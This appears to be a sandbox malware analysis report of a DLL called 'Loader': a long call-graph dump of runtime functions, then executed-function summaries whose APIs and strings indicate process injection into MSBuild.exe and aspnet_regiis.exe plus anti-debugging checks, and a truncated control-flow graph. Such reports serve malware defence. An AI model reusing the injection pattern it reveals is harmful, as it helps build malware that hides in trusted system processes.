LeaveCriticalSection 11787->11829 11789 6ce550ad 11789->11756 11790->11782 11792 6ce551e2 11791->11792 11793 6ce551eb 11791->11793 11794 6ce550cb ___scrt_uninitialize_crt 66 API calls 11792->11794 11804 6ce55170 11793->11804 11796 6ce551e8 11794->11796 11796->11786 11799 6ce55207 11817 6ce567f2 11799->11817 11828 6ce5534e LeaveCriticalSection 11801->11828 11803 6ce55001 11803->11774 11805 6ce551ad 11804->11805 11806 6ce55188 11804->11806 11805->11796 11810 6ce55518 11805->11810 11806->11805 11807 6ce55518 ___scrt_uninitialize_crt 25 API calls 11806->11807 11808 6ce551a6 11807->11808 11809 6ce56fea ___scrt_uninitialize_crt 62 API calls 11808->11809 11809->11805 11811 6ce55524 11810->11811 11812 6ce55539 11810->11812 11813 6ce5304b _free 14 API calls 11811->11813 11812->11799 11814 6ce55529 11813->11814 11815 6ce51828 ___std_exception_copy 25 API calls 11814->11815 11816 6ce55534 11815->11816 11816->11799 11818 6ce56803 11817->11818 11819 6ce56810 11817->11819 11821 6ce5304b _free 14 API calls 11818->11821 11820 6ce56859 11819->11820 11823 6ce56837 11819->11823 11822 6ce5304b _free 14 API calls 11820->11822 11827 6ce56808 11821->11827 11824 6ce5685e 11822->11824 11825 6ce56750 ___scrt_uninitialize_crt 29 API calls 11823->11825 11826 6ce51828 ___std_exception_copy 25 API calls 11824->11826 11825->11827 11826->11827 11827->11796 11828->11803 11829->11789 11831 6ce50f44 11830->11831 11832 6ce51326 11830->11832 11834 6ce51373 11831->11834 11838 6ce514f1 11832->11838 11835 6ce5137e 11834->11835 11837 6ce5139d 11834->11837 11836 6ce51388 DeleteCriticalSection 11835->11836 11836->11836 11836->11837 11837->11760 11843 6ce5146d 11838->11843 11841 6ce51523 TlsFree 11842 6ce51517 11841->11842 11842->11831 11844 6ce51485 11843->11844 11845 6ce514a8 11843->11845 11844->11845 11849 6ce513d3 11844->11849 11845->11841 11845->11842 11848 6ce5149a GetProcAddress 11848->11845 11854 6ce513df ___vcrt_FlsSetValue 11849->11854 11850 6ce51453 11850->11845 11850->11848 11851 6ce513f5 LoadLibraryExW 11852 6ce51413 GetLastError 11851->11852 11853 6ce5145a 11851->11853 11852->11854 11853->11850 11855 6ce51462 FreeLibrary 11853->11855 11854->11850 11854->11851 11856 6ce51435 LoadLibraryExW 11854->11856 11855->11850 11856->11853 11856->11854 11862 6ce52663 11857->11862 11860 6ce5131c ___vcrt_uninitialize_ptd 6 API calls 11861 6ce4eb05 11860->11861 11861->11568 11865 6ce52e5f 11862->11865 11866 6ce52e69 11865->11866 11868 6ce4efed 11865->11868 11869 6ce54790 11866->11869 11868->11860 11870 6ce5466f _free 5 API calls 11869->11870 11871 6ce547ac 11870->11871 11872 6ce547b5 11871->11872 11873 6ce547c7 TlsFree 11871->11873 11872->11868 11874->11544 11875 6ce4e904 11876 6ce4e942 11875->11876 11877 6ce4e90f 11875->11877 11878 6ce4ea5e __DllMainCRTStartup@12 84 API calls 11876->11878 11879 6ce4e934 11877->11879 11880 6ce4e914 11877->11880 11886 6ce4e91e 11878->11886 11887 6ce4e957 11879->11887 11882 6ce4e919 11880->11882 11883 6ce4e92a 11880->11883 11882->11886 11901 6ce4ef82 11882->11901 11906 6ce4ef63 11883->11906 11888 6ce4e963 ___scrt_is_nonwritable_in_current_image 11887->11888 11914 6ce4eff5 11888->11914 11890 6ce4e96a __DllMainCRTStartup@12 11891 6ce4ea56 11890->11891 11892 6ce4e991 11890->11892 11898 6ce4e9cd ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 11890->11898 11894 6ce4f194 __DllMainCRTStartup@12 4 API calls 11891->11894 11922 6ce4ef55 11892->11922 11895 6ce4ea5d 11894->11895 11896 6ce4e9a0 __RTC_Initialize 11896->11898 11925 6ce4ee73 InitializeSListHead 11896->11925 11898->11886 11899 6ce4e9ae 11899->11898 11926 6ce4ef2a 11899->11926 11975 6ce5262b 11901->11975 12178 6ce50f20 11906->12178 11909 6ce4ef6c 11909->11886 11912 6ce4ef7f 11912->11886 11913 6ce50f2b 21 API calls 11913->11909 11915 6ce4effe 11914->11915 11930 6ce4f358 IsProcessorFeaturePresent 11915->11930 11919 6ce4f00f 11920 6ce4f013 11919->11920 11921 6ce50f36 ___scrt_uninitialize_crt 7 API calls 11919->11921 11920->11890 11921->11920 11969 6ce4f02e 11922->11969 11924 6ce4ef5c 11924->11896 11925->11899 11927 6ce4ef2f ___scrt_release_startup_lock 11926->11927 11928 6ce4f358 IsProcessorFeaturePresent 11927->11928 11929 6ce4ef38 11927->11929 11928->11929 11929->11898 11931 6ce4f00a 11930->11931 11932 6ce50f01 11931->11932 11940 6ce51337 11932->11940 11936 6ce50f12 11937 6ce50f1d 11936->11937 11938 6ce51373 ___vcrt_uninitialize_locks DeleteCriticalSection 11936->11938 11937->11919 11939 6ce50f0a 11938->11939 11939->11919 11941 6ce51340 11940->11941 11943 6ce51369 11941->11943 11944 6ce50f06 11941->11944 11954 6ce515a5 11941->11954 11945 6ce51373 ___vcrt_uninitialize_locks DeleteCriticalSection 11943->11945 11944->11939 11946 6ce512e9 11944->11946 11945->11944 11959 6ce514b6 11946->11959 11951 6ce51319 11951->11936 11952 6ce5131c ___vcrt_uninitialize_ptd 6 API calls 11953 6ce512fe 11952->11953 11953->11936 11955 6ce5146d ___vcrt_FlsSetValue 5 API calls 11954->11955 11956 6ce515bf 11955->11956 11957 6ce515dd InitializeCriticalSectionAndSpinCount 11956->11957 11958 6ce515c8 11956->11958 11957->11958 11958->11941 11960 6ce5146d ___vcrt_FlsSetValue 5 API calls 11959->11960 11961 6ce514d0 11960->11961 11962 6ce514e9 TlsAlloc 11961->11962 11963 6ce512f3 11961->11963 11963->11953 11964 6ce51567 11963->11964 11965 6ce5146d ___vcrt_FlsSetValue 5 API calls 11964->11965 11966 6ce51581 11965->11966 11967 6ce5159c TlsSetValue 11966->11967 11968 6ce5130c 11966->11968 11967->11968 11968->11951 11968->11952 11970 6ce4f03e 11969->11970 11971 6ce4f03a 11969->11971 11972 6ce4f194 __DllMainCRTStartup@12 4 API calls 11970->11972 11974 6ce4f04b ___scrt_release_startup_lock 11970->11974 11971->11924 11973 6ce4f0b4 11972->11973 11974->11924 11981 6ce52bfb 11975->11981 11978 6ce50f2b 12161 6ce51213 11978->12161 11982 6ce52c05 11981->11982 11983 6ce4ef87 11981->11983 11984 6ce547cf _free 6 API calls 11982->11984 11983->11978 11985 6ce52c0c 11984->11985 11985->11983 11986 6ce5480e _free 6 API calls 11985->11986 11987 6ce52c1f 11986->11987 11989 6ce52ac2 11987->11989 11990 6ce52acd 11989->11990 11991 6ce52add 11989->11991 11995 6ce52ae3 11990->11995 11991->11983 11994 6ce52f67 _free 14 API calls 11994->11991 11996 6ce52afe 11995->11996 11997 6ce52af8 11995->11997 11999 6ce52f67 _free 14 API calls 11996->11999 11998 6ce52f67 _free 14 API calls 11997->11998 11998->11996 12000 6ce52b0a 11999->12000 12001 6ce52f67 _free 14 API calls 12000->12001 12002 6ce52b15 12001->12002 12003 6ce52f67 _free 14 API calls 12002->12003 12004 6ce52b20 12003->12004 12005 6ce52f67 _free 14 API calls 12004->12005 12006 6ce52b2b 12005->12006 12007 6ce52f67 _free 14 API calls 12006->12007 12008 6ce52b36 12007->12008 12009 6ce52f67 _free 14 API calls 12008->12009 12010 6ce52b41 12009->12010 12011 6ce52f67 _free 14 API calls 12010->12011 12012 6ce52b4c 12011->12012 12013 6ce52f67 _free 14 API calls 12012->12013 12014 6ce52b57 12013->12014 12015 6ce52f67 _free 14 API calls 12014->12015 12016 6ce52b65 12015->12016 12021 6ce5290f 12016->12021 12022 6ce5291b ___scrt_is_nonwritable_in_current_image 12021->12022 12037 6ce52eba EnterCriticalSection 12022->12037 12024 6ce52925 12027 6ce52f67 _free 14 API calls 12024->12027 12028 6ce5294f 12024->12028 12027->12028 12038 6ce5296e 12028->12038 12029 6ce5297a 12030 6ce52986 ___scrt_is_nonwritable_in_current_image 12029->12030 12042 6ce52eba EnterCriticalSection 12030->12042 12032 6ce52990 12043 6ce52bb0 12032->12043 12034 6ce529a3 12047 6ce529c3 12034->12047 12037->12024 12041 6ce52f02 LeaveCriticalSection 12038->12041 12040 6ce5295c 12040->12029 12041->12040 12042->12032 12044 6ce52be6 __fassign 12043->12044 12045 6ce52bbf __fassign 12043->12045 12044->12034 12045->12044 12050 6ce55680 12045->12050 12160 6ce52f02 LeaveCriticalSection 12047->12160 12049 6ce529b1 12049->11994 12051 6ce55696 12050->12051 12053 6ce55700 12050->12053 12051->12053 12055 6ce556c9 12051->12055 12060 6ce52f67 _free 14 API calls 12051->12060 12054 6ce52f67 _free 14 API calls 12053->12054 12077 6ce5574e 12053->12077 12056 6ce55722 12054->12056 12057 6ce556eb 12055->12057 12065 6ce52f67 _free 14 API calls 12055->12065 12058 6ce52f67 _free 14 API calls 12056->12058 12059 6ce52f67 _free 14 API calls 12057->12059 12061 6ce55735 12058->12061 12062 6ce556f5 12059->12062 12064 6ce556be 12060->12064 12066 6ce52f67 _free 14 API calls 12061->12066 12067 6ce52f67 _free 14 API calls 12062->12067 12063 6ce557bc 12068 6ce52f67 _free 14 API calls 12063->12068 12078 6ce575b7 12064->12078 12071 6ce556e0 12065->12071 12072 6ce55743 12066->12072 12067->12053 12073 6ce557c2 12068->12073 12070 6ce52f67 14 API calls _free 12074 6ce5575c 12070->12074 12106 6ce576b5 12071->12106 12076 6ce52f67 _free 14 API calls 12072->12076 12073->12044 12074->12063 12074->12070 12076->12077 12118 6ce557f1 12077->12118 12079 6ce575c8 12078->12079 12105 6ce576b1 12078->12105 12080 6ce575d9 12079->12080 12081 6ce52f67 _free 14 API calls 12079->12081 12082 6ce575eb 12080->12082 12083 6ce52f67 _free 14 API calls 12080->12083 12081->12080 12084 6ce575fd 12082->12084 12085 6ce52f67 _free 14 API calls 12082->12085 12083->12082 12086 6ce5760f 12084->12086 12087 6ce52f67 _free 14 API calls 12084->12087 12085->12084 12088 6ce57621 12086->12088 12089 6ce52f67 _free 14 API calls 12086->12089 12087->12086 12090 6ce57633 12088->12090 12091 6ce52f67 _free 14 API calls 12088->12091 12089->12088 12092 6ce57645 12090->12092 12093 6ce52f67 _free 14 API calls 12090->12093 12091->12090 12094 6ce57657 12092->12094 12095 6ce52f67 _free 14 API calls 12092->12095 12093->12092 12096 6ce57669 12094->12096 12097 6ce52f67 _free 14 API calls 12094->12097 12095->12094 12098 6ce5767b 12096->12098 12099 6ce52f67 _free 14 API calls 12096->12099 12097->12096 12100 6ce5768d 12098->12100 12101 6ce52f67 _free 14 API calls 12098->12101 12099->12098 12102 6ce5769f 12100->12102 12103 6ce52f67 _free 14 API calls 12100->12103 12101->12100 12104 6ce52f67 _free 14 API calls 12102->12104 12102->12105 12103->12102 12104->12105 12105->12055 12107 6ce576c2 12106->12107 12117 6ce5771a 12106->12117 12108 6ce52f67 _free 14 API calls 12107->12108 12110 6ce576d2 12107->12110 12108->12110 12109 6ce576e4 12112 6ce576f6 12109->12112 12113 6ce52f67 _free 14 API calls 12109->12113 12110->12109 12111 6ce52f67 _free 14 API calls 12110->12111 12111->12109 12114 6ce57708 12112->12114 12115 6ce52f67 _free 14 API calls 12112->12115 12113->12112 12116 6ce52f67 _free 14 API calls 12114->12116 12114->12117 12115->12114 12116->12117 12117->12057 12119 6ce5581d 12118->12119 12120 6ce557fe 12118->12120 12119->12074 12120->12119 12124 6ce57756 12120->12124 12123 6ce52f67 _free 14 API calls 12123->12119 12125 6ce55817 12124->12125 12126 6ce57767 12124->12126 12125->12123 12127 6ce5771e __fassign 14 API calls 12126->12127 12128 6ce5776f 12127->12128 12129 6ce5771e __fassign 14 API calls 12128->12129 12130 6ce5777a 12129->12130 12131 6ce5771e __fassign 14 API calls 12130->12131 12132 6ce57785 12131->12132 12133 6ce5771e __fassign 14 API calls 12132->12133 12134 6ce57790 12133->12134 12135 6ce5771e __fassign 14 API calls 12134->12135 12136 6ce5779e 12135->12136 12137 6ce52f67 _free 14 API calls 12136->12137 12138 6ce577a9 12137->12138 12139 6ce52f67 _free 14 API calls 12138->12139 12140 6ce577b4 12139->12140 12141 6ce52f67 _free 14 API calls 12140->12141 12142 6ce577bf 12141->12142 12143 6ce5771e __fassign 14 API calls 12142->12143 12144 6ce577cd 12143->12144 12145 6ce5771e __fassign 14 API calls 12144->12145 12146 6ce577db 12145->12146 12147 6ce5771e __fassign 14 API calls 12146->12147 12148 6ce577ec 12147->12148 12149 6ce5771e __fassign 14 API calls 12148->12149 12150 6ce577fa 12149->12150 12151 6ce5771e __fassign 14 API calls 12150->12151 12152 6ce57808 12151->12152 12153 6ce52f67 _free 14 API calls 12152->12153 12154 6ce57813 12153->12154 12155 6ce52f67 _free 14 API calls 12154->12155 12156 6ce5781e 12155->12156 12157 6ce52f67 _free 14 API calls 12156->12157 12158 6ce57829 12157->12158 12159 6ce52f67 _free 14 API calls 12158->12159 12159->12125 12160->12049 12162 6ce4ef8c 12161->12162 12163 6ce51220 12161->12163 12162->11886 12164 6ce5122e 12163->12164 12169 6ce5152c 12163->12169 12166 6ce51567 ___vcrt_FlsSetValue 6 API calls 12164->12166 12167 6ce5123e 12166->12167 12174 6ce511f7 12167->12174 12170 6ce5146d ___vcrt_FlsSetValue 5 API calls 12169->12170 12171 6ce51546 12170->12171 12172 6ce5155e TlsGetValue 12171->12172 12173 6ce51552 12171->12173 12172->12173 12173->12164 12175 6ce51201 12174->12175 12176 6ce5120e 12174->12176 12175->12176 12177 6ce519be ___std_exception_destroy 14 API calls 12175->12177 12176->12162 12177->12176 12184 6ce51257 12178->12184 12180 6ce4ef68 12180->11909 12181 6ce52620 12180->12181 12182 6ce52d7e _free 14 API calls 12181->12182 12183 6ce4ef74 12182->12183 12183->11912 12183->11913 12185 6ce51260 12184->12185 12186 6ce51263 GetLastError 12184->12186 12185->12180 12187 6ce5152c ___vcrt_FlsGetValue 6 API calls 12186->12187 12188 6ce51278 12187->12188 12189 6ce512dd SetLastError 12188->12189 12190 6ce51567 ___vcrt_FlsSetValue 6 API calls 12188->12190 12197 6ce51297 12188->12197 12189->12180 12191 6ce51291 12190->12191 12192 6ce512b9 12191->12192 12193 6ce51567 ___vcrt_FlsSetValue 6 API calls 12191->12193 12191->12197 12194 6ce51567 ___vcrt_FlsSetValue 6 API calls 12192->12194 12195 6ce512cd 12192->12195 12193->12192 12194->12195 12196 6ce519be ___std_exception_destroy 14 API calls 12195->12196 12196->12197 12197->12189 12851 6ce50d80 12852 6ce50d9e 12851->12852 12863 6ce50d40 12852->12863 12864 6ce50d52 12863->12864 12865 6ce50d5f 12863->12865 12866 6ce4e890 _ValidateLocalCookies 5 API calls 12864->12866 12866->12865 12867 6ce51100 12868 6ce51112 12867->12868 12870 6ce51120 12867->12870 12869 6ce4e890 _ValidateLocalCookies 5 API calls 12868->12869 12869->12870 12871 6ce51003 12872 6ce5103c 12871->12872 12873 6ce5100c 12871->12873 12873->12872 12880 6ce51249 12873->12880 12876 6ce51249 47 API calls 12877 6ce51052 12876->12877 12894 6ce52675 12877->12894 12881 6ce51257 23 API calls 12880->12881 12883 6ce5124e 12881->12883 12882 6ce51047 12882->12876 12883->12882 12884 6ce54d02 __fassign 2 API calls 12883->12884 12885 6ce52710 12884->12885 12886 6ce5271b 12885->12886 12887 6ce54d47 __fassign 37 API calls 12885->12887 12888 6ce52725 IsProcessorFeaturePresent 12886->12888 12889 6ce52744 12886->12889 12887->12886 12890 6ce52731 12888->12890 12891 6ce51e58 __fassign 23 API calls 12889->12891 12892 6ce5167c __fassign 8 API calls 12890->12892 12893 6ce5274e 12891->12893 12892->12889 12895 6ce52681 ___scrt_is_nonwritable_in_current_image 12894->12895 12896 6ce52c27 __fassign 37 API calls 12895->12896 12899 6ce52686 12896->12899 12897 6ce5270b __fassign 37 API calls 12898 6ce526b0 12897->12898 12899->12897 12900 6ce521cc 12901 6ce521e1 12900->12901 12902 6ce5305e _free 14 API calls 12901->12902 12912 6ce52208 12902->12912 12903 6ce5226d 12904 6ce52f67 _free 14 API calls 12903->12904 12905 6ce52287 12904->12905 12906 6ce5305e _free 14 API calls 12906->12912 12907 6ce5226f 12909 6ce5229c 14 API calls 12907->12909 12910 6ce52275 12909->12910 12913 6ce52f67 _free 14 API calls 12910->12913 12911 6ce5228f 12914 6ce51855 ___std_exception_copy 11 API calls 12911->12914 12912->12903 12912->12906 12912->12907 12912->12911 12915 6ce52f67 _free 14 API calls 12912->12915 12917 6ce526b1 12912->12917 12913->12903 12916 6ce5229b 12914->12916 12915->12912 12918 6ce526cc 12917->12918 12919 6ce526be 12917->12919 12920 6ce5304b _free 14 API calls 12918->12920 12919->12918 12924 6ce526e3 12919->12924 12921 6ce526d4 12920->12921 12922 6ce51828 ___std_exception_copy 25 API calls 12921->12922 12923 6ce526de 12922->12923 12923->12912 12924->12923 12925 6ce5304b _free 14 API calls 12924->12925 12925->12921 12926 6ce5230f 12927 6ce52321 12926->12927 12928 6ce52327 12926->12928 12929 6ce5229c 14 API calls 12927->12929 12929->12928 12930 6ce4ef8f 12932 6ce4ef97 ___scrt_release_startup_lock 12930->12932 12934 6ce51a4c 12932->12934 12933 6ce4efbf 12935 6ce51a5f 12934->12935 12936 6ce51a5b 12934->12936 12939 6ce51a6c 12935->12939 12936->12933 12940 6ce52d7e _free 14 API calls 12939->12940 12941 6ce51a68 12940->12941 12941->12933 12942 6ce2f5d0 12944 6ce2f5f5 12942->12944 12943 6ce4c330 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12943->12944 12944->12943 12945 6ce2fe3f 12944->12945 12946 6ce4e890 _ValidateLocalCookies 5 API calls 12945->12946 12947 6ce2fe54 12946->12947 12948 6ce4b090 12950 6ce4b0a8 12948->12950 12949 6ce4b4c6 12950->12949 12952 6ce4b500 12950->12952 12956 6ce4b555 12952->12956 12953 6ce4b927 12954 6ce4e890 _ValidateLocalCookies 5 API calls 12953->12954 12955 6ce4b931 12954->12955 12955->12950 12956->12953 12957 6ce4fe0f 14 API calls ___std_exception_destroy 12956->12957 12957->12956 12958 6ce4b990 12963 6ce4b9e5 12958->12963 12959 6ce4b500 19 API calls 12959->12963 12960 6ce4be77 12961 6ce4e890 _ValidateLocalCookies 5 API calls 12960->12961 12962 6ce4be81 12961->12962 12963->12959 12963->12960 12967 6ce563dc 12968 6ce563f4 12967->12968 12969 6ce563e9 12967->12969 12971 6ce563fc 12968->12971 12977 6ce56405 _free 12968->12977 12970 6ce52f19 15 API calls 12969->12970 12976 6ce563f1 12970->12976 12974 6ce52f67 _free 14 API calls 12971->12974 12972 6ce5642f HeapReAlloc 12972->12976 12972->12977 12973 6ce5640a 12975 6ce5304b _free 14 API calls 12973->12975 12974->12976 12975->12976 12977->12972 12977->12973 12978 6ce5192a _free 2 API calls 12977->12978 12978->12977 12979 6ce4f598 12980 6ce47250 std::bad_exception::bad_exception 25 API calls 12979->12980 12981 6ce4f5a6 12980->12981 12982 6ce5255a 12985 6ce525e0 12982->12985 12986 6ce525f4 12985->12986 12987 6ce5256d 12985->12987 12986->12987 12988 6ce52f67 _free 14 API calls 12986->12988 12988->12987

                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                  Function 6CE28C20 Relevance: 110.6, APIs: 36, Strings: 24, Instructions: 5633nativethreadmemoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Virtual$Memory$Write$ThreadWindow$AllocateCloseHandle$ConsoleContextShow$CreateReadResume$AllocProcess
                                                                                                                                                                                                                                                                  • String ID: 55i$7'a$8Q,Q$?8%~$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$D&5{$MZx$Nvkf$RNS$VW(E$h<x$h<x$kernel32.dll$ntdll.dll$rSt$$rSt$$ut-M$ x7$ x7$\rf$\rf
                                                                                                                                                                                                                                                                  • API String ID: 1660976819-3335305182
                                                                                                                                                                                                                                                                  • Opcode ID: 22b972f553901dcf639869b9a5766a68276dc9c7b46454740df47b7922dfc3de
                                                                                                                                                                                                                                                                  • Instruction ID: 9a66974f5235196f622c622235881f00396dce1ea5239894ba2b3a4b4e48dc23
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22b972f553901dcf639869b9a5766a68276dc9c7b46454740df47b7922dfc3de
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2FA30032B456608FDB18CE3CD9957CE77F2AB87319F204299D459DB780D2398A4ACF42
                                                                                                                                                                                                                                                                  Function 6CE20470 Relevance: 60.3, APIs: 22, Strings: 10, Instructions: 4278filememoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileHandle$Close$Create$ProtectVirtual$Module$CurrentInformationMappingNameProcessView
                                                                                                                                                                                                                                                                  • String ID: %D%$ %D%$@$M.nC$M.nC$g'<$$nKJb$u5.$nas$u41
                                                                                                                                                                                                                                                                  • API String ID: 1716851264-1750082930
                                                                                                                                                                                                                                                                  • Opcode ID: 0385f65a332dfcb4a89bcf70f938c77471d76eb8b5f060c28bd19b5b70591e14
                                                                                                                                                                                                                                                                  • Instruction ID: aeb114c1a6dbd187652603ffac34477eecc73ab33a7b58509fb99c8a8209e64c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0385f65a332dfcb4a89bcf70f938c77471d76eb8b5f060c28bd19b5b70591e14
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60631236B442558FCB08CE3CD9D53DE77F3AB47364F208659D419CB794D63A8A4A8B02
                                                                                                                                                                                                                                                                  Function 6CE26E60 Relevance: 20.4, APIs: 2, Strings: 9, Instructions: 1195COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 1317 6ce26e60-6ce26eb2 1318 6ce26eb9-6ce26ec4 1317->1318 1319 6ce26eca-6ce26ed7 1318->1319 1320 6ce27b48-6ce27b4f 1318->1320 1323 6ce279c2-6ce27a0b 1319->1323 1324 6ce26edd-6ce26eea 1319->1324 1322 6ce27f1a 1320->1322 1322->1318 1323->1322 1326 6ce27a10-6ce27a7e 1324->1326 1327 6ce26ef0-6ce26efd 1324->1327 1326->1322 1329 6ce26f03-6ce26f10 1327->1329 1330 6ce27738-6ce2773f 1327->1330 1332 6ce26f16-6ce26f23 1329->1332 1333 6ce276a4-6ce276ed 1329->1333 1330->1322 1335 6ce27ef5-6ce27f05 1332->1335 1336 6ce26f29-6ce26f36 1332->1336 1333->1322 1335->1322 1338 6ce273c8-6ce27411 1336->1338 1339 6ce26f3c-6ce26f49 1336->1339 1338->1322 1341 6ce278c6-6ce278cd 1339->1341 1342 6ce26f4f-6ce26f5c 1339->1342 1341->1322 1344 6ce26f62-6ce26f6f 1342->1344 1345 6ce275c7-6ce275dd 1342->1345 1347 6ce278d2-6ce278df 1344->1347 1348 6ce26f75-6ce26f82 1344->1348 1345->1322 1347->1322 1350 6ce27ba2-6ce27c08 1348->1350 1351 6ce26f88-6ce26f95 1348->1351 1350->1322 1353 6ce26f9b-6ce26fa8 1351->1353 1354 6ce272e9-6ce2730a 1351->1354 1356 6ce27a83-6ce27a8a 1353->1356 1357 6ce26fae-6ce26fbb 1353->1357 1354->1322 1356->1322 1359 6ce26fc1-6ce26fce 1357->1359 1360 6ce27524-6ce27570 call 6ce24460 call 6ce4f660 1357->1360 1363 6ce26fd4-6ce26fe1 1359->1363 1364 6ce274f5-6ce2751f GetModuleHandleW 1359->1364 1360->1322 1369 6ce27d72-6ce27d8c call 6ce4e890 1363->1369 1370 6ce26fe7-6ce26ff4 1363->1370 1364->1322 1374 6ce26ffa-6ce27007 1370->1374 1375 6ce2730f-6ce2737d 1370->1375 1377 6ce27dcb-6ce27e14 1374->1377 1378 6ce2700d-6ce2701a 1374->1378 1375->1322 1377->1322 1380 6ce27020-6ce2702d 1378->1380 1381 6ce27ec5-6ce27ecc 1378->1381 1383 6ce27033-6ce27040 1380->1383 1384 6ce27ca1-6ce27cf3 1380->1384 1381->1322 1386 6ce27d46-6ce27d4d 1383->1386 1387 6ce27046-6ce27053 1383->1387 1384->1322 1386->1322 1389 6ce27575-6ce275c2 NtQueryInformationProcess 1387->1389 1390 6ce27059-6ce27066 1387->1390 1389->1322 1392 6ce27416-6ce27479 1390->1392 1393 6ce2706c-6ce27079 1390->1393 1392->1322 1395 6ce27b54-6ce27b9d 1393->1395 1396 6ce2707f-6ce2708c 1393->1396 1395->1322 1398 6ce27092-6ce2709f 1396->1398 1399 6ce27e95-6ce27e9c 1396->1399 1401 6ce270a5-6ce270b2 1398->1401 1402 6ce27e19-6ce27e90 1398->1402 1399->1322 1404 6ce270b8-6ce270c5 1401->1404 1405 6ce27d5e-6ce27d6d 1401->1405 1402->1322 1407 6ce270cb-6ce270d8 1404->1407 1408 6ce2747e-6ce274e4 1404->1408 1405->1322 1410 6ce27ee9-6ce27ef0 1407->1410 1411 6ce270de-6ce270eb 1407->1411 1408->1322 1410->1322 1413 6ce27792-6ce27808 1411->1413 1414 6ce270f1-6ce270fe 1411->1414 1413->1322 1416 6ce27104-6ce27111 1414->1416 1417 6ce274e9-6ce274f0 1414->1417 1419 6ce27382-6ce273c3 1416->1419 1420 6ce27117-6ce27124 1416->1420 1417->1322 1419->1322 1422 6ce27ed1-6ce27ed8 1420->1422 1423 6ce2712a-6ce27137 1420->1423 1422->1322 1425 6ce27f0a-6ce27f13 1423->1425 1426 6ce2713d-6ce2714a 1423->1426 1425->1322 1428 6ce27150-6ce2715d 1426->1428 1429 6ce27878-6ce278c1 1426->1429 1431 6ce27163-6ce27170 1428->1431 1432 6ce27eb9-6ce27ec0 1428->1432 1429->1322 1434 6ce27176-6ce27183 1431->1434 1435 6ce27edd-6ce27ee4 1431->1435 1432->1322 1437 6ce27d52-6ce27d59 1434->1437 1438 6ce27189-6ce27196 1434->1438 1435->1322 1437->1322 1440 6ce27a8f-6ce27afd 1438->1440 1441 6ce2719c-6ce271a9 1438->1441 1440->1322 1443 6ce27c53-6ce27c9c 1441->1443 1444 6ce271af-6ce271bc 1441->1444 1443->1322 1446 6ce271c2-6ce271cf 1444->1446 1447 6ce27ead-6ce27eb4 1444->1447 1449 6ce276f2-6ce27733 1446->1449 1450 6ce271d5-6ce271e2 1446->1450 1447->1322 1449->1322 1452 6ce278e4-6ce2794a 1450->1452 1453 6ce271e8-6ce271f5 1450->1453 1452->1322 1455 6ce27744-6ce2778d 1453->1455 1456 6ce271fb-6ce27208 1453->1456 1455->1322 1458 6ce27cf8-6ce27d41 1456->1458 1459 6ce2720e-6ce2721b 1456->1459 1458->1322 1461 6ce27221-6ce2722e 1459->1461 1462 6ce27628-6ce2769f 1459->1462 1464 6ce27db7-6ce27dc6 1461->1464 1465 6ce27234-6ce27241 1461->1465 1462->1322 1464->1322 1467 6ce27247-6ce27254 1465->1467 1468 6ce2794f-6ce279bd 1465->1468 1470 6ce2725a-6ce27267 1467->1470 1471 6ce2780d-6ce27873 1467->1471 1468->1322 1473 6ce27da8-6ce27db2 1470->1473 1474 6ce2726d-6ce2727a 1470->1474 1471->1322 1473->1322 1476 6ce27280-6ce2728d 1474->1476 1477 6ce27c0d-6ce27c4e 1474->1477 1479 6ce275e2-6ce27623 1476->1479 1480 6ce27293-6ce272a0 